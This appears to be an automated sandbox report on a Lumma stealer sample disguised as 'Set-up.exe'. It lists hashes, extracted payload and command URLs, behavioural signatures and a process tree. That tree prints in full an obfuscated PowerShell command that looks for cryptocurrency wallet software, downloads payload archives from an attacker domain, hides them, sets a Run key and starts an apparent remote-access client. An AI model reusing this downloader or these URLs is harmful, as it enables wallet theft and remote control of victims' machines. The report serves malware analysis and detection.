Overview
overview
10Static
static
3Set-up.exe
windows7-x64
10Set-up.exe
windows10-2004-x64
10contactsUX.dll
windows7-x64
3contactsUX.dll
windows10-2004-x64
3msidcrl40.dll
windows7-x64
3msidcrl40.dll
windows10-2004-x64
3msncore.dll
windows7-x64
3msncore.dll
windows10-2004-x64
3msvcr80.dll
windows7-x64
3msvcr80.dll
windows10-2004-x64
3plugins/ac...in.dll
windows7-x64
3plugins/ac...in.dll
windows10-2004-x64
3plugins/ac...in.dll
windows7-x64
3plugins/ac...in.dll
windows10-2004-x64
3plugins/au...in.dll
windows7-x64
3plugins/au...in.dll
windows10-2004-x64
3plugins/au...in.dll
windows7-x64
3plugins/au...in.dll
windows10-2004-x64
3plugins/co...in.dll
windows7-x64
3plugins/co...in.dll
windows10-2004-x64
3plugins/co...in.dll
windows7-x64
3plugins/co...in.dll
windows10-2004-x64
3plugins/vi...in.dll
windows7-x64
3plugins/vi...in.dll
windows10-2004-x64
3plugins/vi...in.dll
windows7-x64
3plugins/vi...in.dll
windows10-2004-x64
3plugins/vi...in.dll
windows7-x64
3plugins/vi...in.dll
windows10-2004-x64
3plugins/vi...in.dll
windows7-x64
3plugins/vi...in.dll
windows10-2004-x64
3updater/nvdisps.dll
windows7-x64
5updater/nvdisps.dll
windows10-2004-x64
5Analysis
-
max time kernel
115s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
13-11-2024 15:17
Static task
static1
Behavioral task
behavioral1
Sample
Set-up.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Set-up.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
contactsUX.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
contactsUX.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
msidcrl40.dll
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
msidcrl40.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
msncore.dll
Resource
win7-20241010-en
Behavioral task
behavioral8
Sample
msncore.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
msvcr80.dll
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
msvcr80.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
plugins/access/libfilesystem_plugin.dll
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
plugins/access/libfilesystem_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
plugins/access/libimem_plugin.dll
Resource
win7-20241010-en
Behavioral task
behavioral14
Sample
plugins/access/libimem_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral15
Sample
plugins/audio_output/libdirectsound_plugin.dll
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
plugins/audio_output/libdirectsound_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral17
Sample
plugins/audio_output/libwasapi_plugin.dll
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
plugins/audio_output/libwasapi_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral19
Sample
plugins/codec/libavcodec_plugin.dll
Resource
win7-20240903-en
Behavioral task
behavioral20
Sample
plugins/codec/libavcodec_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral21
Sample
plugins/codec/libd3d11va_plugin.dll
Resource
win7-20241010-en
Behavioral task
behavioral22
Sample
plugins/codec/libd3d11va_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral23
Sample
plugins/video_output/libdirect3d11_plugin.dll
Resource
win7-20241023-en
Behavioral task
behavioral24
Sample
plugins/video_output/libdirect3d11_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral25
Sample
plugins/video_output/libdirect3d9_plugin.dll
Resource
win7-20240903-en
Behavioral task
behavioral26
Sample
plugins/video_output/libdirect3d9_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral27
Sample
plugins/video_output/libdrawable_plugin.dll
Resource
win7-20241010-en
Behavioral task
behavioral28
Sample
plugins/video_output/libdrawable_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral29
Sample
plugins/video_output/libvmem_plugin.dll
Resource
win7-20241010-en
Behavioral task
behavioral30
Sample
plugins/video_output/libvmem_plugin.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral31
Sample
updater/nvdisps.dll
Resource
win7-20240903-en
Behavioral task
behavioral32
Sample
updater/nvdisps.dll
Resource
win10v2004-20241007-en
General
-
Target
Set-up.exe
-
Size
5.5MB
-
MD5
537915708fe4e81e18e99d5104b353ed
-
SHA1
128ddb7096e5b748c72dc13f55b593d8d20aa3fb
-
SHA256
6dc7275f2143d1de0ca66c487b0f2ebff3d4c6a79684f03b9619bf23143ecf74
-
SHA512
9ceaaf7aa5889be9f5606646403133782d004b9d78ef83d7007dfce67c0f4f688d7931aebc74f1fc30aac2f1dd6281bdadfb52bc3ea46aca33b334adb4067ae2
-
SSDEEP
49152:ERUl697ngPTrho9J8kgdjbHNZ5PP/Re5m3mxVN6KEp0v7J7k66ZRkQTXw+sljVop:uAXqnhON8m3mzNHTdw6YSX+sleu5y
Malware Config
Extracted
https://mindfusteps.shop/minz/m4nd.zip
https://mindfusteps.shop/minz/m2nd.zip
https://mindfusteps.shop/minz/m3nd.zip
https://mindfusteps.shop/minz/m1nd.zip
https://mindfusteps.shop/mind/
Extracted
lumma
https://mindfuljournal.shop/api
Signatures
-
Lumma family
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid Process 46 3248 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
RDJUYV.pifpid Process 4144 RDJUYV.pif -
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
RDJUYV.pifdescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dbabech = "\"C:\\ehfecbk\\AutoIt3.exe\" C:\\ehfecbk\\dbabech.a3x" RDJUYV.pif -
Suspicious use of SetThreadContext 2 IoCs
Processes:
Set-up.exeRDJUYV.pifdescription pid Process procid_target PID 1852 set thread context of 4192 1852 Set-up.exe 86 PID 4144 set thread context of 4012 4144 RDJUYV.pif 100 -
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
RDJUYV.pifvbc.exepowershell.exeSet-up.exemore.comvbc.exepowershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RDJUYV.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Set-up.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language more.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RDJUYV.pifdescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RDJUYV.pif Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RDJUYV.pif -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
Set-up.exemore.comvbc.exepowershell.exepowershell.exepid Process 1852 Set-up.exe 1852 Set-up.exe 4192 more.com 4192 more.com 4688 vbc.exe 4688 vbc.exe 4688 vbc.exe 4688 vbc.exe 3248 powershell.exe 3248 powershell.exe 3260 powershell.exe 3260 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
Set-up.exemore.compid Process 1852 Set-up.exe 4192 more.com -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 3248 powershell.exe Token: SeDebugPrivilege 3260 powershell.exe -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
Set-up.exemore.comvbc.exeRDJUYV.pifpowershell.exedescription pid Process procid_target PID 1852 wrote to memory of 4192 1852 Set-up.exe 86 PID 1852 wrote to memory of 4192 1852 Set-up.exe 86 PID 1852 wrote to memory of 4192 1852 Set-up.exe 86 PID 1852 wrote to memory of 4192 1852 Set-up.exe 86 PID 4192 wrote to memory of 4688 4192 more.com 93 PID 4192 wrote to memory of 4688 4192 more.com 93 PID 4192 wrote to memory of 4688 4192 more.com 93 PID 4192 wrote to memory of 4688 4192 more.com 93 PID 4688 wrote to memory of 3248 4688 vbc.exe 96 PID 4688 wrote to memory of 3248 4688 vbc.exe 96 PID 4688 wrote to memory of 3248 4688 vbc.exe 96 PID 4192 wrote to memory of 4688 4192 more.com 93 PID 4688 wrote to memory of 4144 4688 vbc.exe 98 PID 4688 wrote to memory of 4144 4688 vbc.exe 98 PID 4688 wrote to memory of 4144 4688 vbc.exe 98 PID 4144 wrote to memory of 4604 4144 RDJUYV.pif 99 PID 4144 wrote to memory of 4604 4144 RDJUYV.pif 99 PID 4144 wrote to memory of 4604 4144 RDJUYV.pif 99 PID 4144 wrote to memory of 4012 4144 RDJUYV.pif 100 PID 4144 wrote to memory of 4012 4144 RDJUYV.pif 100 PID 4144 wrote to memory of 4012 4144 RDJUYV.pif 100 PID 4144 wrote to memory of 4012 4144 RDJUYV.pif 100 PID 4144 wrote to memory of 4012 4144 RDJUYV.pif 100 PID 3248 wrote to memory of 3260 3248 powershell.exe 101 PID 3248 wrote to memory of 3260 3248 powershell.exe 101 PID 3248 wrote to memory of 3260 3248 powershell.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\Set-up.exe"C:\Users\Admin\AppData\Local\Temp\Set-up.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\SysWOW64\more.comC:\Windows\SysWOW64\more.com2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\O93LZ727PJ79L0E0TL1CJ7.ps1"4⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3248 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOPrOF -Ep BYPAss -W hI -eNc $ e d H H f = ' h K c U : \ s o f t W a R e \ c l a S s e s \ ' ;   $ w A a j = $ e n V : L O c A l a P p D A t a + ' \ p R O g r A M S \ ' ;   $ 9 v x n 5 = ( G E T - W m I o B j E c T   - C L a s S   W i N 3 2 _ C o m p U t e r S Y s t E m ) . p A R T O f d O M A I N ;   $ V v p S = 0 ;   $ V 4 t o n = ' c : \ P r o G r A M   F i L e s \ ' ;   $ r 5 S u i = ' H K L M : \ S O f t w a R E \ c L A s S E S \ ' ;   $ E k Q d = ' h k C U : \ s O f t W A r E \ ' ;   $ Y M c z = @ (   $ v 4 t O N + ' b I T b O x \ b I t b o x . E X E ' ;   $ W A a j + ' C Y p h E r o C K   C Y S y N C \ C y p H e R O C K   C Y s y n C . E X e ' ;   $ E d H h f + ' k E e p k e Y ' ;   $ W A a J + ' k E E v O - W a L l e T \ K E E v O   l i n K . e X e ' ;   $ V 4 T o N + ' l e D g e r   l I V e \ L e d g e R   l I v e . E x e ' ;   $ e k Q d + ' b I T B o X a p P ' ;   $ w A A j + ' T R E Z O R   S U i T e \ T R E z o r   S U I T E . e X E ' ;   $ w a a j + ' R a b B y - d E S K t O p \ r A b B y   D e s K T o p . E X E ' ;   $ E K q d + ' m I c R o S o f T \ W i N D O w S \ c u R R e N t V E r s i O n \ u N i n s t A L L \ B i t b o X A P P ' ;   $ R 5 s U I + ' l E d g e R l i V E ' ;   $ E D h H f + ' a o p p ' ;   $ E D h H F + ' T R e Z O r s U I t E ' ;   $ v 4 T o N + ' b C   V A U L t \ B c V a U L T . E X e ' ;   $ r 5 S u I + ' B C v a u l t ' ;   $ W a a j + ' K e e p K e Y - D E S k t O P \ K E E p k E y   D e s k T o P . e x E ' ;   $ E K q D + ' r E A L   s e c u r i t Y \ b C v a u L t ' ;   $ E d h h F + ' K e E V O ' ;   $ E D H h F + ' L i Q U i d n e t W o r k ' ;   $ E d H H F + ' C Y P h E r O C K ' ;   $ e D H H F + ' o n E k E Y - w A l l e T ' ;   $ v 4 t o N + ' B L o c k S T r e a m \ b l O C K S t r e A M   g r E E n \ B L o C K S t R e a M   G R E e n . e X e ' ;   $ V 4 t O N + ' O n e K E Y \ o n E k e y . e x e ' ;   ) ;   $ h N o z = $ Y m C Z . l E N G T h ;   i F   ( $ 9 v x N 5 )   { $ v v p S = 1 }   E L s e   {   f o r   ( $ M 9 p w A = 0 ;   $ m 9 P w a   - L t   $ H N O z   - a N D   $ v V P S   - E q   0 ;   $ M 9 P w a + + )   {   I F   ( t E s T - p a t h   $ y M C Z [ $ m 9 P w a ] )   { $ V v P s = 1 } ; } ; } ;   I f   ( $ v v p s   - e q   1 )   {   C h d i R   $ E n v : A P P d A T a ;   $ R R R E e f H G = g e t - c O m m a n D   E x p A n D - a R C H I v E   - E R r O R A c t I o n   s i L E N T l y c O N t I n U E ;   $ t l e Q r Y = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n z / m 4 n d . z i p ' ;   $ V j r F t C g G = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n z / m 2 n d . z i p ' ;   $ b E z g j v Q I = ' v d f o r 4 h q . z i p ' ;   $ y X C P e M Q R = G C M   S t a R t - b i t s T R A n S f E R   - E r R o R a C T I O N   s i L e N T l y C O n t I N U e ;   $ 8 G Q 9 n t = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n z / m 3 n d . z i p ' ;   $ 8 T g q 3 E 5 = ' 3 q o 3 F c O . z i p ' ;   $ g G B D r n l = ' S m a r t D e f r a g T o o l ' ;   $ J f C i n G = ' 1 a K H x P B . z i p ' ;   [ N e t . s e r v i c e p O I N T m A N a G e r ] : : S E c U R i T y P r O t o C O l   =   [ N e t . S e c U r i T y p r O t o c o l t Y P e ] : : t L s 1 2 ;   $ u F G 9 b 7 j z = ' m A L l Q A . z i p ' ;   $ b 8 7 N 9 u = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n z / m 1 n d . z i p ' ;   $ U p x e w 6 F = " $ e N V : a P P D A t a \ $ 8 T g q 3 E 5 " ;   $ t j e 6 g 3 = $ E N V : a p P d A t A ,   $ b E z g j v Q I   - j o i N   ' \ ' ;   $ 3 s U H E X o = " $ E N v : a P P d a T a \ $ J f C i n G " ;   $ 4 5 Y J W y B = " { 0 } \ { 1 } "   - f   $ E N v : a P P d a T a ,   $ u F G 9 b 7 j z ;   $ A r M X I r Y v = " b i t s a D m I N . e X e   / T r A n s f E r   6 D r y 6 h p o   / D O w n l O A D   / P R i O r I T Y   n o R M a l   $ V j r F t C g G   $ U p x e w 6 F " ;   $ 1 m p h u T S i = " $ E n V : a p p D a t A \ $ g G B D r n l " ;   $ C K g l d V = " b i T S A d m i N . E x E   / t R a N s f e r   0 m 1 Y s L 7   / d O w n L o A d   / P r I o r I T Y   N o R m A l   $ 8 G Q 9 n t   $ t j e 6 g 3 " ;   $ u E x Z 6 R P D = ' b I T S a d M i n . e x e   / t R A n S f E R   p X R P D f t   / D o W N l o A d   / p R I o R I t Y   n O r m a l   ' + $ b 8 7 N 9 u + '   ' + $ 3 s U H E X o ;   $ p F 7 H 5 J U = " b I T S a d M i n . e x e   / t R A n S f E R   p X R P D f t   / D o W N l o A d   / p R I o R I t Y   n O r m a l   { 0 }   { 1 } "   - f   $ b 8 7 N 9 u ,   $ 4 5 Y J W y B ;   I f   ( $ R R R E e f H G )   {   I F   ( $ y X C P e M Q R )   {   S t a r t - B I T S t r a N S f e R   - S o U r c e   $ V j r F t C g G   - D e s t I n A t I O n   $ U p x e w 6 F ;   s T a r t - B I T s t R A N S F E R   - s O u R c E   $ 8 G Q 9 n t   - d E S T i n A T i o n   $ t j e 6 g 3 ;   s T A r t - b I T S t r A N S f E R   - s o U r c E   $ b 8 7 N 9 u   - D E s T I N a t I O N   $ 3 s U H E X o ;   s T A R T - B i T s t R a n S F E r   - s O u R c E   $ t l e Q r Y   - D E s T i n a t i o N   $ 4 5 Y J W y B ;   }   E l S E   { i E X   - c o m m a N D   $ u E x Z 6 R P D ;   I E X   - C o m m A n D   $ p F 7 H 5 J U ;   i e x   - c o m m a n d   $ A r M X I r Y v ;   &   $ C K g l d V ;   }   E x p A N D - A r c h i V e   - P A T h   $ 4 5 Y J W y B   - D e S t I N a T I o n P a t h   $ 1 m p h u T S i ;   E x p A N D - a R c h i V E   - P a t H   $ t j e 6 g 3   - d e s t i n a T I o N p a t h   $ 1 m p h u T S i ;   E x P A N d - A R C H i v E   - p A t H   $ 3 s U H E X o   - d E S T i n a T i O N p A t H   $ 1 m p h u T S i ;   e x P A n d - A r C h i V e   - p a t h   $ U p x e w 6 F   - D e S T i n a t i o N p A t H   $ 1 m p h u T S i ;   R m   - P a T h   $ t j e 6 g 3 ;   R D   - p A T H   $ U p x e w 6 F ;   R D   - p A t H   $ 4 5 Y J W y B ;   r e M O v e - I t e m   - P A T h   $ 3 s U H E X o ;   }   E L S E   {   $ Z A P P f t = @ ( ' p c i c a p i . d l l ' ,   ' c l i e n t 3 2 . i n i ' ,   ' T C C T L 3 2 . D L L ' ,   ' n s m _ v p r o . i n i ' ,   ' N S M . L I C ' ,   ' H T C T L 3 2 . D L L ' ,   ' r e m c m d s t u b . e x e ' ,   ' A u d i o C a p t u r e . d l l ' ,   ' n s k b f l t r . i n f ' ,   ' P C I C H E K . D L L ' ,   ' P C I C L 3 2 . D L L ' ,   ' c l i e n t 3 2 . e x e ' ,   ' m s v c r 1 0 0 . d l l ' ) ;   n i   - P A T h   $ E n v : a P p d A t A   - n A m e   $ g G B D r n l   - i T e M T y P e   ' d i r e c t o r y ' ;   $ g 1 i 5 r x B = ' h t t p s : / / m i n d f u s t e p s . s h o p / m i n d / ' ;   I F   ( $ y X C P e M Q R )   {   $ Z A P P f t   |   F o R E A c h - O B j E C t   {   $ h E V T G u q o = $ g 1 i 5 r x B + $ _ ;   $ S M J K N P = j O I N - p A t h   - P A t h   $ 1 m p h u T S i   - c H i l D P a T h   $ _ ;   s t a R t - b I T S t r a n S F E R   - s O u r C e   $ h E V T G u q o   - d E s T i n A T i o N   $ S M J K N P ;   } ; }   e L S E   {   $ Z A P P f t   |   f o R E a C H - o B J E C T   {   $ h E V T G u q o = $ g 1 i 5 r x B + $ _ ;   $ S M J K N P = $ 1 m p h u T S i ,   $ _   - j O I N   ' \ ' ;   $ p R l r a a Z C = ' B i t S a d m I N . e x E   / t r A n S f E r   6 L P t 8 K 2 g   / d o W n l o A d   / P R I O R I T y   N O r M A L   ' + $ h E V T G u q o + '   ' + $ S M J K N P ;   I E X   - C o m m A n D   $ p R l r a a Z C ; } ;   } ;   } ;   $ y F h z F L = G I   $ 1 m p h u T S i   - f o r C e ;   $ y F h z F L . a T T R i b u t E s = ' H i d d e n ' ;   C h d i R   $ 1 m p h u T S i ;   $ X C U F g c q = " $ 1 m p h u T S i \ c l i e n t 3 2 . e x e " ;   N E W - I t E m p R o p e R T y   - P a t H   ' H K C u : \ s o F T w A R e \ M I C r o s o F t \ w i N D O W S \ c U R r E n T V E R s I O N \ r u n '   - n A m e   $ g G B D r n l   - v a l U e   $ X C U F g c q   - P r O P E r t y t y p e   ' S t r i n g ' ;   S t a r t - P R O C e S S   c l I E n t 3 2 . E X e ;   } ; 5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3260
-
-
-
C:\Users\Admin\AppData\Roaming\RDJUYV.pif"C:\Users\Admin\AppData\Roaming\RDJUYV.pif" "C:\Users\Admin\AppData\Roaming\79AFBM.xlsx"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe5⤵PID:4604
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe5⤵
- System Location Discovery: System Language Discovery
PID:4012
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD55315900105942deb090a358a315b06fe
SHA122fe5d2e1617c31afbafb91c117508d41ef0ce44
SHA256e8bd7d8d1d0437c71aceb032f9fb08dd1147f41c048540254971cc60e95d6cd7
SHA51277e8d15b8c34a1cb01dbee7147987e2cc25c747e0f80d254714a93937a6d2fe08cb5a772cf85ceb8fec56415bfa853234a003173718c4229ba8cfcf2ce6335a6
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
1013KB
MD5f7b47df6923eabe96417f277c97f32bf
SHA1b031c79c7b8a2585d6c1eff80674b09eca5fc154
SHA256bbb3a5fa0a62a0c0c33b053b506866b62511f21966a4dd6777bb70a2c4b7267d
SHA51254f9584215ba5b1646b1c7d0f23c14793de4831c01214ca9f5828235dc366cbbdaeecc0b940a5ca3df4d458c14e7a881d9528671ef8bcc37baf758a6073914b4
-
Filesize
332B
MD5a93ef812fcdf3af24ff8b33a75d4992e
SHA1b282892bd321a8709474f43d790d7e661edaa98f
SHA256d5a89ca10e0e354df724efa955616b27501534cd5153f3c387c9d569a73cdbc6
SHA512272da3e9cb498541454f381d360e4dd47498ecf1f604844dcaea21316a3f37547688f52439d38bb6208f513ba8fc9e442b82cbb622c6579323530c342853b037
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
5.7MB
MD53c6d0866e54ab391bc09713fde4c9d38
SHA1a1a4e9c067e3c85739e85fb45f7ecdb363bcf856
SHA256ffe15bff44969541749b01e1ab80492c95990bf4af35fb62e0d93bf6a4b81682
SHA512eebf8ca2e3d778ca9706276b26c4d3daedf9cb7067d695cbf9e07755e6887e782d25a8aa6785034052b39105518c69f7e09b12c8199e58d13fcaf6b7f82b58b4
-
Filesize
921KB
MD53f58a517f1f4796225137e7659ad2adb
SHA1e264ba0e9987b0ad0812e5dd4dd3075531cfe269
SHA2561da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48
SHA512acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634